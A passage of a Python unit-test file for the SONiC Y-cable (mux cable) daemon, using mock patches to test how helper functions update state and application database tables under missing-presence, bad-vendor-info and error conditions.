@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_appdb_port_mux_cable_response_table_active_side_none(self):
asic_index = 0
appl_db = "TEST_DB"
logical_port_name = "Ethernet0"
read_side = 1
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
# Defining function without self argument creates an exception,
# which is what we want for this test.
def get_mux_direction():
pass
patched_util.get.return_value = PortInstanceHelper()
rc = update_appdb_port_mux_cable_response_table(
logical_port_name, asic_index, appl_db, read_side)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_appdb_port_mux_cable_response_table_active_side_is_read_side(self):
asic_index = 0
appl_db = "TEST_DB"
logical_port_name = "Ethernet0"
read_side = 1
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
def get_mux_direction(self):
return 1
patched_util.get.return_value = PortInstanceHelper()
rc = update_appdb_port_mux_cable_response_table(
logical_port_name, asic_index, appl_db, read_side)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_appdb_port_mux_cable_response_table_active_side_not_read_side(self):
asic_index = 0
appl_db = "TEST_DB"
logical_port_name = "Ethernet0"
read_side = 2
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
def get_mux_direction(self):
return 1
patched_util.get.return_value = PortInstanceHelper()
rc = update_appdb_port_mux_cable_response_table(
logical_port_name, asic_index, appl_db, read_side)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_appdb_port_mux_cable_response_table_active_side_status_unknown(self):
asic_index = 0
appl_db = "TEST_DB"
logical_port_name = "Ethernet0"
read_side = 1
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
def get_mux_direction(self):
return 4
patched_util.get.return_value = PortInstanceHelper()
rc = update_appdb_port_mux_cable_response_table(
logical_port_name, asic_index, appl_db, read_side)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
def test_update_appdb_port_mux_cable_response_table_no_presence_status_unknown(self):
asic_index = 0
appl_db = "TEST_DB"
logical_port_name = "Ethernet0"
read_side = 1
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
def get_mux_direction(self):
return 4
patched_util.get.return_value = PortInstanceHelper()
rc = update_appdb_port_mux_cable_response_table(
logical_port_name, asic_index, appl_db, read_side)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0, 1, 2]))
def test_update_appdb_port_mux_cable_response_table_invalid_ycable_mapping(self):
asic_index = 0
appl_db = "TEST_DB"
logical_port_name = "Ethernet0"
read_side = 1
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
def get_mux_direction(self):
return 4
patched_util.get.return_value = PortInstanceHelper()
rc = update_appdb_port_mux_cable_response_table(
logical_port_name, asic_index, appl_db, read_side)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0, 1, 2]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_read_y_cable_and_update_statedb_port_tbl_invalid_ycable_mapping(self):
logical_port_name = "Ethernet0"
statedb_port_tbl = {}
asic_index = 0
appl_db = "TEST_DB"
statedb_port_tbl[asic_index] = swsscommon.Table(
appl_db[asic_index], "STATEDB_PORT_TABLE")
rc = read_y_cable_and_update_statedb_port_tbl(
logical_port_name, statedb_port_tbl[asic_index])
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_none(self):
logical_port_name = "Ethernet0"
statedb_port_tbl = {}
asic_index = 0
appl_db = "TEST_DB"
statedb_port_tbl[asic_index] = swsscommon.Table(
appl_db[asic_index], "STATEDB_PORT_TABLE")
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
def mock_get():
pass
patched_util.get.return_value = mock_get()
rc = read_y_cable_and_update_statedb_port_tbl(
logical_port_name, statedb_port_tbl[asic_index])
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_get_presence_false(self):
logical_port_name = "Ethernet0"
statedb_port_tbl = {}
asic_index = 0
appl_db = "TEST_DB"
statedb_port_tbl[asic_index] = swsscommon.Table(
appl_db[asic_index], "STATEDB_PORT_TABLE")
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
def mock_get():
pass
patched_util.get.return_value = mock_get()
rc = read_y_cable_and_update_statedb_port_tbl(
logical_port_name, statedb_port_tbl[asic_index])
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_get_read_side_exception(self):
logical_port_name = "Ethernet0"
statedb_port_tbl = {}
asic_index = 0
appl_db = "TEST_DB"
statedb_port_tbl[asic_index] = swsscommon.Table(
appl_db[asic_index], "STATEDB_PORT_TABLE")
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
# Defining function without self argument creates an exception,
# which is what we want for this test.
def get_read_side():
pass
patched_util.get.return_value = PortInstanceHelper()
rc = read_y_cable_and_update_statedb_port_tbl(
logical_port_name, statedb_port_tbl[asic_index])
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_get_mux_dir_exception(self):
logical_port_name = "Ethernet0"
statedb_port_tbl = {}
asic_index = 0
appl_db = "TEST_DB"
statedb_port_tbl[asic_index] = swsscommon.Table(
appl_db[asic_index], "STATEDB_PORT_TABLE")
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
def get_read_side(self):
return 1
# Defining function without self argument creates an exception,
# which is what we want for this test.
def get_mux_direction():
pass
patched_util.get.return_value = PortInstanceHelper()
rc = read_y_cable_and_update_statedb_port_tbl(
logical_port_name, statedb_port_tbl[asic_index])
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_status_active(self):
logical_port_name = "Ethernet0"
statedb_port_tbl = {}
asic_index = 0
appl_db = "TEST_DB"
statedb_port_tbl[asic_index] = swsscommon.Table(
appl_db[asic_index], "STATEDB_PORT_TABLE")
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
def get_read_side(self):
return 1
def get_mux_direction(self):
return 1
patched_util.get.return_value = PortInstanceHelper()
rc = read_y_cable_and_update_statedb_port_tbl(
logical_port_name, statedb_port_tbl[asic_index])
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_status_standby(self):
logical_port_name = "Ethernet0"
statedb_port_tbl = {}
asic_index = 0
appl_db = "TEST_DB"
statedb_port_tbl[asic_index] = swsscommon.Table(
appl_db[asic_index], "STATEDB_PORT_TABLE")
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
def get_read_side(self):
return 1
def get_mux_direction(self):
return 2
patched_util.get.return_value = PortInstanceHelper()
rc = read_y_cable_and_update_statedb_port_tbl(
logical_port_name, statedb_port_tbl[asic_index])
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_read_y_cable_and_update_statedb_port_tbl_port_instance_status_unknown(self):
logical_port_name = "Ethernet0"
statedb_port_tbl = {}
asic_index = 0
appl_db = "TEST_DB"
statedb_port_tbl[asic_index] = swsscommon.Table(
appl_db[asic_index], "STATEDB_PORT_TABLE")
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
def get_read_side(self):
return 1
def get_mux_direction(self):
return 0
patched_util.get.return_value = PortInstanceHelper()
rc = read_y_cable_and_update_statedb_port_tbl(
logical_port_name, statedb_port_tbl[asic_index])
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_create_tables_and_insert_mux_unknown_entries(self):
state_db = {}
asic_index = 0
logical_port_name = "Ethernet0"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
rc = create_tables_and_insert_mux_unknown_entries(
state_db, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_status_false(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = False
fvs = [('state', "manual")]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_state_absent(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('badstate', "auto")]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_bad_state_value(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "badvalue")]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_no_presence(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_no_port_info(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = None
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0, 1, 2]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_multiple_port_instances(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {
'manufacturer': 'Microsoft', 'model': 'simulated'}
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_no_vendor_port_info(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {
'bad_manufacturer': 'Microsoft', 'model': 'simulated'}
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_no_model_port_info(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {
'manufacturer': 'Microsoft', 'bad_model': 'simulated'}
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_invalid_vendor_port_info(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {
'manufacturer': 'not_Microsoft', 'model': 'simulated'}
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_invalid_model_port_info(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {
'manufacturer': 'Microsoft', 'model': 'bad_model1'}
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_module_dir_none(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {
'manufacturer': 'not_Microsoft', 'model': 'simulated'}
with patch('sonic_y_cable.y_cable_vendor_mapping.mapping') as mock_mapping:
mock_mapping.get.return_value = None
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('sonic_y_cable.y_cable_vendor_mapping.mapping.get', MagicMock(return_value={"Microsoft": {"module": "test_module"}}))
def test_check_identifier_presence_and_update_mux_table_entry_module_none(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = True
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {
'manufacturer': 'not_Microsoft', 'model': 'model1'}
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('sonic_y_cable.y_cable_vendor_mapping.mapping.get', MagicMock(return_value={"simulated": "microsoft.y_cable_simulated"}))
def test_check_identifier_presence_and_update_mux_table_entry_module_microsoft(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = [True]
y_cable_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)
static_tbl[asic_index] = swsscommon.Table(
